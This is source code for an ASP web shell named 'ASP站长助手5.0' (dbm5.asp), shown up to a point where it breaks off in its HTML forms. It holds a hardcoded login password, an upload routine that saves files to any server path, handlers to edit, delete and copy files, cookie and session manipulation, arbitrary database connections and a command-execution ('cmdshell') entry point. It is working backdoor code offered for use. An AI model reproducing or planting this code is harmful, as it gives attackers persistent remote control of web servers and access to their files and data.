dbm5.asp

ASP站长助手5.0

<%
response.buffer=true
filename=Request.ServerVariables("URL")
Server.ScriptTimeout=5000
On Error Resume Next 
proname="ASP站长助手5.0"
Rem 下面是登录密码修改的地方 默认为 gxgl.com
userpass="gxgl.com"

Dim oUpFileStream

Class UpFile_Class

Dim Form,File

Public Sub GetDate (RetSize)
   '定义变量
  Dim RequestBinDate,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo
  Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
  Dim iFindStart,iFindEnd
  Dim iFormStart,iFormEnd,sFormName
   '代码开始
  If Request.TotalBytes < 1 Then
    Err = 1
    Exit Sub
  End If
  If RetSize > 0 Then 
    If Request.TotalBytes > RetSize Then
    Err = 2
    Exit Sub
    End If
  End If
  Set Form = Server.CreateObject ("Scripting.Dictionary")
  Form.CompareMode = 1
  Set File = Server.CreateObject ("Scripting.Dictionary")
  File.CompareMode = 1
  Set tStream = Server.CreateObject ("Adodb.Stream")
  Set oUpFileStream = Server.CreateObject ("Adodb.Stream")
  oUpFileStream.Type = 1
  oUpFileStream.Mode = 3
  oUpFileStream.Open 
  oUpFileStream.Write Request.BinaryRead (Request.TotalBytes)
  oUpFileStream.Position = 0
  RequestBinDate = oUpFileStream.Read 
  iFormEnd = oUpFileStream.Size
  bCrLf = ChrB (13) & ChrB (10)
  '取得每个项目之间的分隔符
  sSpace = MidB (RequestBinDate,1, InStrB (1,RequestBinDate,bCrLf)-1)
  iStart = LenB  (sSpace)
  iFormStart = iStart+2
  '分解项目
  Do
    iInfoEnd = InStrB (iFormStart,RequestBinDate,bCrLf & bCrLf)+3
    tStream.Type = 1
    tStream.Mode = 3
    tStream.Open
    oUpFileStream.Position = iFormStart
    oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart
    tStream.Position = 0
    tStream.Type = 2
    tStream.CharSet = "gb2312"
    sInfo = tStream.ReadText      
    iFormStart = InStrB (iInfoEnd,RequestBinDate,sSpace)-1
    iFindStart = InStr (22,sInfo,"name=""",1)+6
    iFindEnd = InStr (iFindStart,sInfo,"""",1)
    sFormName = Mid  (sinfo,iFindStart,iFindEnd-iFindStart)
    If InStr  (45,sInfo,"filename=""",1) > 0 Then
      Set oFileInfo = new FileInfo_Class
      iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10
      iFindEnd = InStr (iFindStart,sInfo,"""",1)
      sFileName = Mid  (sinfo,iFindStart,iFindEnd-iFindStart)
      oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "\")+1) 
      oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "\"))
      oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
      iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14
      iFindEnd = InStr (iFindStart,sInfo,vbCr)
      oFileInfo.FileType = Mid  (sinfo,iFindStart,iFindEnd-iFindStart)
      oFileInfo.FileStart = iInfoEnd
      oFileInfo.FileSize = iFormStart -iInfoEnd -2
      oFileInfo.FormName = sFormName
      file.add sFormName,oFileInfo
    else

      tStream.Close
      tStream.Type = 1
      tStream.Mode = 3
      tStream.Open
      oUpFileStream.Position = iInfoEnd 
      oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2
      tStream.Position = 0
      tStream.Type = 2
      tStream.CharSet = "gb2312"
      sFormValue = tStream.ReadText
      If Form.Exists (sFormName) Then
        Form (sFormName) = Form (sFormName) & ", " & sFormValue
        else
        form.Add sFormName,sFormValue
      End If
    End If
    tStream.Close
    iFormStart = iFormStart+iStart+2
  Loop Until  (iFormStart+2) = iFormEnd 
  RequestBinDate = ""
  Set tStream = Nothing
End Sub
End Class

Class FileInfo_Class
Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt
Public Function SaveToFile (Path)
  On Error Resume Next
  Dim oFileStream
  Set oFileStream = CreateObject ("Adodb.Stream")
  oFileStream.Type = 1
  oFileStream.Mode = 3
  oFileStream.Open
  oUpFileStream.Position = FileStart
  oUpFileStream.CopyTo oFileStream,FileSize
  oFileStream.SaveToFile Path,2
  oFileStream.Close
  Set oFileStream = Nothing 
End Function

Public Function FileDate
  oUpFileStream.Position = FileStart
  FileDate = oUpFileStream.Read (FileSize)
  End Function
End Class

if request("up")="yes" then
   set upload=new UpFile_Class
   upload.GetDate (1024*1024)
   for each formName in upload.file
   set file=upload.file(formName)
    if file.FileSize>0 then
	   if instr(upload.form("filepath"),":")>0 then
       savepath=upload.form("filepath")
       else
       savepath=Server.mappath(upload.form("filepath"))
       end if
	file.SaveToFile savepath
	response.write "上传成功!上传后的路径为"&savepath&"<br>"
   end if
   set file=nothing
   next
   set upload=nothing
   showerr()
   response.end
end if
%>
<center>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=proname%></title>
<style type="text/css">
<!--
td,textarea,body{
    font-size:9pt;
	}
table{
	background-color: #ffffff;
	border-top: 1px solid #cccccc;
	border-right: 1px solid #666666;
	border-bottom: 1px solid #666666;
	border-left: 1px solid #cccccc;
}
input{
	background-color: #efefef;
	border-top: 1px solid #cccccc;
	border-right: 1px solid #666666;
	border-bottom: 1px solid #666666;
	border-left: 1px solid #cccccc;
}
.small{font-size:8pt}
-->
</style>
<script language="javascript">
function yesok(){
if (confirm("确认要执行此操作吗？"))
		return true;
	else
		return false;
}
 function show(page,ptitle,w,h)
  {
window.open(page,ptitle,"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,width="+w+",height="+h);
  }

</script>
<%

Dim userpass,Conn,ConnStr,SQL,Help,dbp

repage=request.servervariables("http_referer")

if instr(repage,filename)=0 then repage=filename


if request.form("loginpass")<>"" then
logincheck(request.form("loginpass"))
showerr()
response.end
end if

if session("xl")<>userpass then
loginform()
showerr()
response.end
end if

if request.querystring("logout")="yes" then
logout()
showerr()
response.end
end if


if request("showpath")="yes" then
searchpath()
showerr()
response.end
end if

if request("editpath")<>"" then
edittxtfile(request("editpath"))
showerr()
response.end
end if

if request.form("textpath")<>"" then
call modifyfile(request.form("textpath"))
showerr()
response.end
end if

if request("delpath")<>"" then
call deletefile(request("delpath"))
showerr()
response.end
end if

if request("deldirpath")<>"" then
call deletedir(request("deldirpath"))
showerr()
response.end
end if

if request("copypath")<>"" then
call copyfile(request("copypath"))
showerr()
response.end
end if

if request("upfile")="yes" then
call upfile()
showerr()
response.end
end if

if request("showsc")="yes" then
co1=request.form("co1")
co2=request.form("co2")
cov=request.form("cov")
sess1=request.form("sess1")
sessv=request.form("sessv")

if co1<>"" and co2="" then
Response.Cookies(co1).Expires=Date+30
Response.Cookies(co1)=cov
end if

if request("delsession")<>"" then
session.Contents.Remove(request("delsession"))
response.redirect"?showsc=yes"
response.end
end if
if request("delcookies")<>"" then
Response.Cookies(request("delcookies")).Expires=Date-1
response.redirect"?showsc=yes"
response.end
end if

if co1<>"" and co2<>"" then
Response.Cookies(co1).Expires=Date+30
Response.Cookies(co1)(co2)=cov
end if

if sess1<>"" then
'session.abandon
session(sess1)=sessv
end if

showsc()
showerr()
response.end
end if

if request("cmdshell")="yes" then
cmdshell()
response.end
end if

if request.querystring("cleardata")="yes" then
session("dbsourcepath")=""
session("sqlstr")=""
end if

dbp=request("dbsourcepath")
if dbp<>"" then session("dbsourcepath")=trim(dbp)

if instr(session("dbsourcepath"),":")>0 or instr(LCase(session("dbsourcepath")),"sql server")>0 or instr(LCase(session("dbsourcepath")),"dsn=")>0 then
dbp=session("dbsourcepath")
else
dbp=Server.MapPath(session("dbsourcepath"))
end if

sqlstr=trim(request("sqlstr"))
if sqlstr<>"" then session("sqlstr")=sqlstr

Help="在线数据库管理，在线文件管理，CMD命令执行\n"
Help=Help & "文件上传,站内cookie,session管理\n"
%>
 

  <body topmargin="5" onkeydown="if(event.ctrlKey&&event.keyCode=='13'){form1.Submit.click();}">
<%sub showsc()%>
  <table width="700" border="0" cellpadding="0" cellspacing="0">
    <form name="form33" method="post" action="">
      <tr bgcolor="#003366"> 
        <td height="27"><font color="#FFFFFF">&nbsp;response.cookies</font><font color="#FFFFFF">(&quot; 
          <input name="co1" value="<%=co1%>" size="15">
          &quot;)(&quot; 
          <input name="co2" value="<%=co2%>" size="15">
          &quot;)=&quot; 
          <input name="cov" value="<%=cov%>" size="15">
          &quot; &nbsp; 
          <input name="Submit" type="submit"  value="设置COOKIES">
          </font></td>
      </tr>
    </form>
    <tr bgcolor="#990000"> 
      <td height="27" bgcolor="#efefef"> 
        <%
response.write"当前本站点保存在你机上的所有COOKIES如下：<br>"
For Each Item in Request.Cookies 
If Request.Cookies(Item).HasKeys Then 

For Each ItemKey in Request.Cookies(Item) 
Response.Write "<b>response.cookies('"&Item &"')('"&ItemKey&"')</b>="& Request.Cookies(Item)(ItemKey)& "<a href='?showsc=yes&delcookies="&item&"'>删</a><br>"
Next 
Else 
Response.Write "<b>response.cookies('"&Item &"')</b>="& Request.Cookies(Item) & "<a href='?showsc=yes&delcookies="&item&"'>删</a><br>"
End If 
Next
%>
      </td>
    </tr>
    <form name="form22" method="post" action="">
      <tr bgcolor="#990000"> 
        <td width="599" height="27"><font color="#FFFFFF">&nbsp;session(&quot; 
          <input name="sess1" value="<%=sess1%>" size="15">
          &quot;)=&quot; 
          <input name="sessv" value="<%=sessv%>" size="15">
          &quot; &nbsp; 
          <input name="Submit" type="submit" id="Submit" value="设置SESSION">